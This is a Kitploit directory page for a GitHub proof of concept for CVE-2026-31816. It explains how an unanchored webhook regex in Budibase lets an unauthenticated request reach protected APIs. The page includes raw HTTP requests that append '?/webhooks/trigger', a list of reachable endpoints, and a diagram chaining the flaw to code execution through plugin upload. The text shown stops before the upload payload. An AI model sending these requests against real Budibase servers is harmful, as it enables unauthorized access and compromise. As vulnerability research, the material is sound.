Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-31816 — CVE-2026-31816 - Budibase Authentication Bypass to RCE | Kitploit
Tools/GitHubGitHub/k3ystr0k3r/cve-2026-31816
Authentication & AuthorizationExploitationWeb Application ExploitationPenetration TestingPayload DevelopmentAPI Security
GitHubk3ystr0k3r/cve-2026-31816

CVE-2026-31816

CVE-2026-31816 - Budibase Authentication Bypass to RCE

View Repository
2141 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-31816 - Budibase Authentication Bypass to RCE

CVE CVSS Vendor Type Impact

CVE-2026-31816 is a critical authentication and authorization bypass vulnerability affecting Budibase.

The vulnerability exists in the server-side authorization middleware responsible for protecting API endpoints. Budibase attempts to identify legitimate webhook endpoints with an unanchored regular expression and evaluates that expression against Koa's ctx.request.url.

Because ctx.request.url contains the query string, an attacker can inject a webhook-looking path into the query component of an otherwise unrelated API request.

For example:

/api/integrations?/webhooks/trigger

The request does not actually target the webhook endpoint. However, the vulnerable check can interpret /webhooks/trigger as evidence that the request is a legitimate webhook request and allow execution to continue without normal authentication and authorization checks.

NVD describes the issue as allowing a completely unauthenticated remote attacker to access server-side API endpoints by appending a webhook path pattern to the URL.


Vulnerability Information

FieldValue
CVECVE-2026-31816
VendorBudibase
ProductBudibase
Affected versions<= 3.31.4
SeverityCritical
CVSS v3.19.1
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CWECWE-74
Attack VectorNetwork
Privileges RequiredNone
User InteractionNone
Authentication RequiredNo

NVD records Budibase versions through 3.31.4 as affected and assigns a CVSS 3.1 score of 9.1.


Root Cause

The vulnerable logic is centered around the webhook detection performed before normal authorization.

The security advisory documents code conceptually equivalent to:

const WEBHOOK_ENDPOINTS = new RegExp(
  [
    "webhooks/trigger",
    "webhooks/schema",
    "webhooks/discord",
    "webhooks/ms-teams"
  ].join("|")
)

export function isWebhookEndpoint(ctx) {
    return WEBHOOK_ENDPOINTS.test(ctx.request.url)
}

The problem is the combination of two behaviors:

  1. The regular expression is not anchored.
  2. ctx.request.url contains the query string.

That means the expression does not need to match the actual request path.

A request such as:

/api/some/protected/endpoint?/webhooks/trigger

still contains the string:

/webhooks/trigger

inside the URL being tested.

The authorization middleware subsequently treats the request as a webhook request and reaches the endpoint without performing the normal authorization flow.

The Budibase security advisory explicitly identifies this as the underlying flaw and notes that the bypass skips authentication, authorization, role checks, and CSRF protection.


Authentication Bypass

A normal request to a protected API endpoint would be expected to pass through the authentication layer.

For example:

GET /api/integrations HTTP/1.1
Host: target.example
Connection: close

A vulnerable instance can instead be reached with the webhook query-string pattern:

GET /api/integrations?/webhooks/trigger HTTP/1.1
Host: target.example
Connection: close

The important part is:

?/webhooks/trigger

The endpoint itself has not changed:

/api/integrations

Only the query string has been modified.

The public Budibase advisory demonstrates this exact technique against /api/integrations and several other server-side endpoints.


Minimal Verification

A safe way to verify the authentication bypass in a controlled lab is to compare an ordinary request with the webhook-query variant.

Baseline

GET /api/integrations HTTP/1.1
Host: 127.0.0.1:10000
Connection: close

Bypass

GET /api/integrations?/webhooks/trigger HTTP/1.1
Host: 127.0.0.1:10000
Connection: close

The vulnerable server can process the second request without the authentication checks that would normally protect the endpoint.

A published PoC similarly uses:

/api/integrations?/webhooks/trigger

as a simple vulnerability check.


Raw HTTP Request — API Access

The following demonstrates the structure of an authenticated API request being transformed into an unauthenticated request by adding the webhook pattern.

POST /api/ta_users/search?/webhooks/trigger HTTP/1.1
Host: 127.0.0.1:10000
Content-Type: application/json
x-budibase-app-id: <TARGET_WORKSPACE_ID>
Connection: close
Content-Length: 12

{"query":{}}

The official Budibase advisory documents this endpoint as one of the affected API surfaces.

Other server-side endpoints documented as reachable through the same flaw include:

/api/tables
/api/datasources
/api/automations
/api/roles
/api/integrations
/api/views
/api/plugins

The key observation is that the vulnerability is not tied to one particular application resource. The affected authorization middleware sits in front of a broad set of server-side APIs.


Exploitation Chain

The authentication bypass can become considerably more serious when combined with a sensitive API capable of accepting attacker-controlled functionality.

The PoC in this repository chains the vulnerability as follows:

                    ┌─────────────────────────┐
                    │     Remote attacker     │
                    └────────────┬────────────┘
                                 │
                                 │  ?/webhooks/trigger
                                 ▼
                    ┌─────────────────────────┐
                    │ Budibase authorization  │
                    │       middleware        │
                    └────────────┬────────────┘
                                 │
                                 │ authentication bypass
                                 ▼
                    ┌─────────────────────────┐
                    │ Protected server-side   │
                    │       API endpoints     │
                    └────────────┬────────────┘
                                 │
                                 │ plugin upload
                                 ▼
                    ┌─────────────────────────┐
                    │   /api/plugin/upload    │
                    └────────────┬────────────┘
                                 │
                                 │ crafted plugin
                                 ▼
                    ┌─────────────────────────┐
                    │  Plugin JavaScript code │
                    │      execution          │
                    └────────────┬────────────┘
                                 │
                                 ▼
                          Code execution

The PoC first verifies the bypass against /api/integrations, then builds a Budibase plugin archive and submits it through /api/plugin/upload.

Raw HTTP Request — Plugin Upload

Download Tool